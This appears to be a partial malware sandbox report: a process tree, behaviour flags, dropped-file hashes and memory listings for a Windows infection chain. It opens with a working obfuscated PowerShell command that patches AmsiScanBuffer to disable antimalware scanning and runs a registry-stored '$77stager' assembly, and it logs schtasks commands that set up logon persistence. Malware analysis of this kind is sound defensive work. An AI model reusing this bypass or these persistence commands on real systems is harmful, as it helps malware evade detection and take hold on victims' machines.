$_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'te'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+'i'+'c'+''+[Char](114)+'o'+'s'+''+[Char](111)+'f'+[Char](116)+'.'+'W'+''+[Char](105)+''+[Char](110)+''+'3'+''+'2'+'.U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$xudQDJDYjrZxeq=$JvxrNJAJRZnQM.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'P'+'r'+'o'+''+'c'+'A'+[Char](100)+''+'d'+''+[Char](114)+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+'l'+'i'+[Char](99)+''+[Char](44)+'Sta'+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$CHCpBIUaszmJjfnDywq=JkArrNdATHnm @([String])([IntPtr]);$fLLniuopiGegqoqJpsdjeB=JkArrNdATHnm @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gTPaFVrrjLn=$JvxrNJAJRZnQM.GetMethod('Ge'+[Char](116)+''+'M'+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+'n'+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$QyekChtyeLjspx=$xudQDJDYjrZxeq.Invoke($Null,@([Object]$gTPaFVrrjLn,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+'b'+''+[Char](114)+'ar'+'y'+''+'A'+'')));$oCTFjBRINtEFpvolL=$xudQDJDYjrZxeq.Invoke($Null,@([Object]$gTPaFVrrjLn,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+'e'+'c'+''+[Char](116)+'')));$RFghayu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($QyekChtyeLjspx,$CHCpBIUaszmJjfnDywq).Invoke('am'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$YpWruKeTqGVrgyFLD=$xudQDJDYjrZxeq.Invoke($Null,@([Object]$RFghayu,[Object]('A'+[Char](109)+'siSc'+[Char](97)+''+[Char](110)+''+[Char](66)+''+'u'+'ff'+'e'+''+'r'+'')));$BLmPAGKXoY=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oCTFjBRINtEFpvolL,$fLLniuopiGegqoqJpsdjeB).Invoke($YpWruKeTqGVrgyFLD,[uint32]8,4,[ref]$BLmPAGKXoY);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YpWruKeTqGVrgyFLD,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oCTFjBRINtEFpvolL,$fLLniuopiGegqoqJpsdjeB).Invoke($YpWruKeTqGVrgyFLD,[uint32]8,0x20,[ref]$BLmPAGKXoY);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+'A'+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\findstr.exefindstr /e "'v" "C:\Users\Admin\AppData\Local\Temp\Uni.bat"3⤵
-
C:\Windows\system32\cscript.execscript //nologo C:\Users\Admin\AppData\Local\Temp\x.vbs3⤵
-
C:\Users\Admin\AppData\Local\Temp\x.exeC:\Users\Admin\AppData\Local\Temp\x.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\x.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f5⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77x.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\x.exe'" /sc onlogon /rl HIGHEST4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Local\Temp\xFilesize
4KB
MD5e4870e835feab58e50c0a2a05fdb733b
SHA1d81f625b7dabc09e9fccd515dcd89c6c1da46ee6
SHA2560ca17ef0a09d95e6751b571a80cc965de79bda8e94c35bdee537c897951125b1
SHA512488234c5c66c3c18376ceff9493c2f12302dafce8b02cd7124bce7682031dad95712a8e652efe75629c101e3efa7347245892a8e89c735816c637ff7ecfb4cd5
-
C:\Users\Admin\AppData\Local\Temp\xFilesize
560KB
MD57a0b5e602d8f8674134628255c8955b3
SHA1eb1171c299ac9dd2199d12d7084a9a68a8ab33ad
SHA2562629b725c93d70dde683bd0bf89e749d4e7c469096a3f0d89fcf09ea871c0021
SHA512b059685576ed14753eee0264a56f8d852036db659ec0aeb91527331ef967f349a8cd57c6f16302acdf6a900718e2588651aed051ed67e4a4f73bf4c0b00f4f41
-
C:\Users\Admin\AppData\Local\Temp\x.exeFilesize
409KB
MD57417c8c73e614f293152575f46134216
SHA1cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA25600c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
-
C:\Users\Admin\AppData\Local\Temp\x.vbsFilesize
380B
MD5ec9a2fb69a379d913a4e0a953cd3b97c
SHA1a0303ed9f787c042071a1286bba43a5bbdd0679e
SHA256cf8268d158bb819ef158ff6ccbed64d5e379148a0adb1f73a082a01d56d0286b
SHA512fef8e24a680991046bd7dacd6079c7e48c3031fe46caae722ea93797ee16c052073ba97959e992ea71ac7ab72fbcedaa5cf4a410657aac4c10ad24de6935e9d6
-
C:\Windows\Temp\__PSScriptPolicyTest_cauzuuhp.air.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/436-8085-0x00007FFB345F0000-0x00007FFB34600000-memory.dmpFilesize
64KB
-
memory/436-8084-0x0000019C9CD30000-0x0000019C9CD5B000-memory.dmpFilesize
172KB
-
memory/436-8078-0x0000019C9CD30000-0x0000019C9CD5B000-memory.dmpFilesize
172KB
-
memory/640-8051-0x000001D503C50000-0x000001D503C7B000-memory.dmpFilesize
172KB
-
memory/640-8044-0x000001D503C50000-0x000001D503C7B000-memory.dmpFilesize
172KB
-
memory/640-8052-0x00007FFB345F0000-0x00007FFB34600000-memory.dmpFilesize
64KB
-
memory/640-8045-0x000001D503C50000-0x000001D503C7B000-memory.dmpFilesize
172KB
-
memory/640-8043-0x000001D5039D0000-0x000001D5039F5000-memory.dmpFilesize
148KB
-
memory/696-8056-0x0000028FE1E00000-0x0000028FE1E2B000-memory.dmpFilesize
172KB
-
memory/696-8063-0x00007FFB345F0000-0x00007FFB34600000-memory.dmpFilesize
64KB
-
memory/696-8062-0x0000028FE1E00000-0x0000028FE1E2B000-memory.dmpFilesize
172KB
-
memory/748-8089-0x00000203A9E90000-0x00000203A9EBB000-memory.dmpFilesize
172KB
-
memory/988-8074-0x00007FFB345F0000-0x00007FFB34600000-memory.dmpFilesize
64KB
-
memory/988-8073-0x0000027A03180000-0x0000027A031AB000-memory.dmpFilesize
172KB
-
memory/988-8067-0x0000027A03180000-0x0000027A031AB000-memory.dmpFilesize
172KB
-
memory/1700-8018-0x00000000065C0000-0x00000000065CA000-memory.dmpFilesize
40KB
-
memory/1700-7998-0x0000000075170000-0x0000000075921000-memory.dmpFilesize
7.7MB
-
memory/2208-8031-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2208-8037-0x00007FFB72A80000-0x00007FFB72B3D000-memory.dmpFilesize
756KB
-
memory/2208-8036-0x00007FFB74560000-0x00007FFB74769000-memory.dmpFilesize
2.0MB
-
memory/2208-8035-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2208-8040-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2208-8032-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2208-8033-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2208-8030-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3592-8029-0x00007FFB72A80000-0x00007FFB72B3D000-memory.dmpFilesize
756KB
-
memory/3592-8028-0x00007FFB74560000-0x00007FFB74769000-memory.dmpFilesize
2.0MB
-
memory/3592-8027-0x0000029A6BE80000-0x0000029A6BEAA000-memory.dmpFilesize
168KB
-
memory/3592-8013-0x0000029A6B9C0000-0x0000029A6B9E2000-memory.dmpFilesize
136KB
-
memory/4824-8004-0x0000000075170000-0x0000000075921000-memory.dmpFilesize
7.7MB
-
memory/4824-7992-0x0000000005E70000-0x0000000005EAC000-memory.dmpFilesize
240KB
-
memory/4824-7991-0x0000000005920000-0x0000000005932000-memory.dmpFilesize
72KB
-
memory/4824-7990-0x0000000004C10000-0x0000000004C76000-memory.dmpFilesize
408KB
-
memory/4824-7989-0x0000000075170000-0x0000000075921000-memory.dmpFilesize
7.7MB
-
memory/4824-7988-0x0000000004CC0000-0x0000000004D52000-memory.dmpFilesize
584KB
-
memory/4824-7987-0x0000000005270000-0x0000000005816000-memory.dmpFilesize
5.6MB
-
memory/4824-7986-0x00000000000D0000-0x000000000013C000-memory.dmpFilesize
432KB
-
memory/4824-7985-0x000000007517E000-0x000000007517F000-memory.dmpFilesize
4KB